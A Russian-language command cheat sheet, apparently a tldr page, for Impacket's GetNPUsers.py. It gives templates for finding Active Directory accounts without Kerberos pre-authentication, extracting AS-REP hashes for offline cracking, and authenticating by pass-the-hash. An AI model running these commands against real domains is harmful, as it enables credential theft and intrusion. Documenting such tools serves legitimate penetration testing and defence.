26 lines
2.0 KiB
Markdown
26 lines
2.0 KiB
Markdown
|
# GetNPUsers.py
|
|||
|
|
|
|||
|
|
> Получать список учётных записей Active Directory с отключённой предварительной аутентификацией Kerberos, которые могут быть уязвимы для атак AS-REP roasting.
|
|||
|
|
> Часть набора инструментов Impacket.
|
|||
|
|
> Больше информации: <https://github.com/fortra/impacket>.
|
|||
|
|
|
|||
|
|
- Вывести список пользователей с отключённой предварительной аутентификацией Kerberos (анонимный перебор по умолчанию):
|
|||
|
|
|
|||
|
|
`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass`
|
|||
|
|
|
|||
|
|
- Выполнить атаку AS-REP roasting и извлечь хеши для офлайн-взлома:
|
|||
|
|
|
|||
|
|
`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass -request`
|
|||
|
|
|
|||
|
|
- Аутентифицироваться с действительными учётными данными (если анонимная привязка отключена):
|
|||
|
|
|
|||
|
|
`GetNPUsers.py {{домен}}/{{имя_пользователя}}:{{пароль}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}`
|
|||
|
|
|
|||
|
|
- Использовать аутентификацию pass-the-hash вместо пароля:
|
|||
|
|
|
|||
|
|
`GetNPUsers.py {{домен}}/{{имя_пользователя}} -hashes {{LM_хеш}}:{{NT_хеш}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}`
|
|||
|
|
|
|||
|
|
- Сохранить результаты в файл для дальнейшего анализа:
|
|||
|
|
|
|||
|
|
`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -request > {{путь/к/выходному_файлу.txt}}`
|